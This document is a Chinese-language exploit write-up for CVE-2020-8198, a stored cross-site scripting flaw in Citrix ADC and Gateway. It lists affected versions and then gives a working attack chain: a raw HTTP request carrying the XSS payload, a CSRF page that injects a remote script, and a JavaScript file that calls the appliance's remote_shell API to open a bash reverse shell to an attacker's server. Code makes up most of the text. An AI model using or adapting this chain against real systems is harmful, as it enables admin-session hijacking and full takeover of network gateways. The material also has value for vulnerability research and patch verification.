        (CVE-2020-8198)Citrix 储存型xss
    =================================
    
    一、漏洞简介
    ------------
    
    要求受害者以NSIP管理员(nsroot)的身份登录
    
    二、漏洞影响
    ------------
    
    Citrix ADC and Citrix Gateway: < 13.0-58.30
    
    Citrix ADC and NetScaler Gateway: < 12.1-57.18
    
    Citrix ADC and NetScaler Gateway: < 12.0-63.21
    
    Citrix ADC and NetScaler Gateway: < 11.1-64.14
    
    NetScaler ADC and NetScaler Gateway: < 10.5-70.18
    
    Citrix SD-WAN WANOP: < 11.1.1a
    
    Citrix SD-WAN WANOP: < 11.0.3d
    
    Citrix SD-WAN WANOP: < 10.2.7
    
    Citrix Gateway Plug-in for Linux: < 1.0.0.137
    
    三、复现过程
    ------------
    
        POST /menu/stapp HTTP/1.1
        Host: www.0-sec.org
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        DNT: 1
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Length: 96
        Content-Type: application/x-www-form-urlencoded
        X-NITRO-USER: henk
    
        sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert('xss')</script>&au=1&username=nsroot
    
    ### 深入利用
    
    > csrf.html
    
        <html>
          <!-- CSRF PoC - generated by Burp Suite Professional -->
          <!-- Stage 1 of the chain: a cross-site POST to /menu/stapp whose
               `appname` field carries the stored-XSS payload (a closing </title>
               followed by a <script> tag that loads code_exec.js from the
               attacker-controlled host). The request only succeeds while the
               victim's browser holds an authenticated NSIP admin (nsroot)
               session, which is the precondition stated in section 一; the form
               is submitted by the user pressing the button. Mitigation: upgrade
               to the fixed versions listed in section 二. -->
          <body>
          <script>history.pushState('', '', '/')</script>
            <form action="https://www.0-sec.org/menu/stapp" method="POST">
              <input type="hidden" name="sid" value="254" />
              <input type="hidden" name="pe" value="1,2,3,4,5" />
              <input type="hidden" name="appname" value="%0a</title><script src='http://localhost:9090/code_exec.js'></script>" />
              <input type="hidden" name="au" value="1" />
              <input type="hidden" name="username" value="nsroot" />
              <input type="submit" value="Submit request" />
            </form>
          </body>
        </html>
    
    > code\_exec.js
    
        function load(url, callback) {
          var xhr = new XMLHttpRequest();
    
          xhr.onreadystatechange = function() {
            if (xhr.readyState === 4) {
              rand = callback(xhr.response);
              exec_command(rand);
            }
          }
    
          xhr.open('GET', url, true);
          xhr.send('');
        }
    
        function get_rand(payload) {
            var lines = payload.split("\n");
            for(var i = 0; i < lines.length; i++) {
                if (lines[i].includes('var rand = "')) {
                    var rand = lines[i].split('"')[1]
                    return rand;
                }
            }
        }
    
        function exec_command(rand) {
            url = '/rapi/remote_shell'
            command = 'bash -c \"bash -i >%26 /dev/tcp/你的服务器/16588 0>%261\"'
    
            var obj = {
                "params":{
                    "warning":"YES"
                },
                "remote_shell":{
                    "command":command,
                    "prompt":">",
                    "target":"shell",
                    "suppress":0,
                    "execute_in_partition":""
                }
            }
    
            var xhr = new XMLHttpRequest();
            
            xhr.onreadystatechange = function() {
                if (xhr.readyState === 4) {
                    response = JSON.parse(xhr.response);
                    alert(response['remote_shell']['output']);
                }
            }
    
            xhr.open('POST', url, true);
            xhr.setRequestHeader('rand_key', rand)
            xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')
            xhr.send('object=' + JSON.stringify(obj));
    
        }
    
        var url = '/menu/stc';
        load(url, get_rand)
    